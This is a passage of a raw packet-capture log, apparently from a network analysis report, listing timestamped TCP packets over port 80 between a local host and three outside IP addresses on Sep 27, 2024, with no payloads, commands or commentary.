                                                                          Sep 27, 2024 04:21:17.215066910 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.215080023 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.215106010 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.216114044 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.216156960 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.216170073 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.216180086 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.216206074 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.216228962 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.216237068 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.216248035 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.216258049 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.216270924 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.216274023 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.216288090 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.216311932 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.216340065 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.216351032 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.216362000 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.216373920 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.216391087 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.216393948 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.216407061 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.216428041 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.216438055 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.216449022 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.216450930 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.216470003 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.216485977 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.216492891 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.216504097 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.216525078 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.216541052 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.216619968 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.216631889 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.216655016 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.216670036 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.216738939 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.216748953 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.216758966 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.216769934 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.216773033 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.216785908 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.216788054 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.216795921 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.216804981 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.216814995 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.216826916 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.216834068 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.216837883 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.216861963 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.216883898 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.216893911 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.216906071 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.216917038 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.216928005 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.216929913 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.216939926 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.216948032 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.216979027 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.217032909 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.217044115 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.217055082 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.217066050 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.217077017 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.217078924 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.217092991 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.217099905 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.217113018 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.217140913 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.217161894 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.217175007 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.217185974 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.217202902 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.217215061 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.220436096 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.220463037 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.220474005 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.220484972 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.220504999 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.220524073 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.220535994 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.220546961 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.220558882 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.220585108 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.220643044 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.220654011 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.220664024 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.220674038 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.220679998 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.220688105 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.220700026 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.220726013 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.220745087 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.220756054 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.220767021 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.220776081 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.220779896 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.220808029 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.227546930 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.227571964 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.227581978 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.227622032 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.227647066 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.227659941 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.227662086 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.227678061 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.227679968 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.227690935 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.227703094 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.227704048 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.227724075 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.227746010 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.229166031 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.229176998 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.229187012 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.229218006 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.229222059 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.229229927 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.229237080 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.229242086 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.229249954 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.229254007 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.229264975 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.229266882 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.229285955 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.229317904 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.247792006 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.247817039 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.247829914 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.247840881 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.247853994 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.247864962 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.247865915 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.247876883 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.247889996 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.247890949 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.247905016 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.247929096 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.247945070 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.247951031 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.247962952 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.247976065 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.247986078 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.248002052 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.248018980 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.248054028 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.248069048 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.248090029 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.248105049 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.254261017 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.254297972 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.254308939 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.254328012 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.254332066 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.254339933 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.254352093 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.254391909 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.254391909 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.254703045 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.254713058 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.254774094 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.254791975 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.254817009 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.254828930 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.254852057 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.254852057 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.254940033 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.254951000 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.254961967 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.254971981 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.254971981 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.254978895 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.254992962 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.255018950 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.255018950 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.255389929 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.255877018 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.255889893 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.255901098 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.255912066 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.255923986 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.255934954 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.255947113 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.255955935 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.255955935 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.255959988 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.255999088 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.255999088 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.256778002 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.256788969 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.256798983 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.256845951 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.256850004 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.256856918 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.256866932 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.256881952 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.256906033 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.256906033 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.256912947 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.256948948 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.256948948 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.257677078 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.257688046 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.257698059 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.257740021 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.257741928 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.257752895 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.257759094 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.257764101 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.257775068 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.257797956 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.257812977 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.257822990 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.258634090 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.258645058 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.258655071 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.258676052 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.258676052 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.258680105 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.258691072 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.258701086 CEST8049722185.215.113.17192.168.2.5
                                                                          Sep 27, 2024 04:21:17.258727074 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.258727074 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.259073973 CEST4972280192.168.2.5185.215.113.17
                                                                          Sep 27, 2024 04:21:17.261439085 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.261492968 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.261533976 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.261543989 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.261554956 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.261567116 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.261575937 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.261583090 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.261593103 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.261600971 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.261605978 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:17.261631966 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.261647940 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:17.263283968 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.263295889 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.263304949 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.263322115 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.263333082 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.263336897 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.263344049 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.263355970 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.263364077 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.263381004 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.263403893 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.265563011 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.265573978 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.265583992 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.265607119 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.265615940 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.265623093 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.265633106 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.265642881 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.265645027 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.265655994 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.265680075 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.265696049 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.269849062 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.269859076 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.269875050 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.269891024 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.269906998 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.269913912 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.269920111 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.269932032 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.269932985 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.269942999 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.269968033 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.269985914 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.270335913 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.270375013 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.270400047 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.270411015 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.270437002 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.270462036 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.270472050 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.270482063 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.270498037 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.270509958 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.270519018 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.270548105 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.270572901 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.271584034 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.271600008 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.271610022 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.271625042 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.271635056 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.271635056 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.271646976 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.271656036 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.271665096 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.271668911 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.271687031 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.271703005 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.272222042 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.272260904 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.272284031 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.272294044 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.272304058 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.272315025 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.272321939 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.272327900 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.272339106 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.272341013 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.272355080 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.272381067 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.272511959 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.272522926 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.272531986 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.272550106 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.272562981 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.272566080 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.272574902 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.272597075 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.272614002 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.272654057 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.272664070 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.272674084 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.272687912 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.272707939 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:17.272730112 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:17.272741079 CEST8049725185.215.113.117192.168.2.5
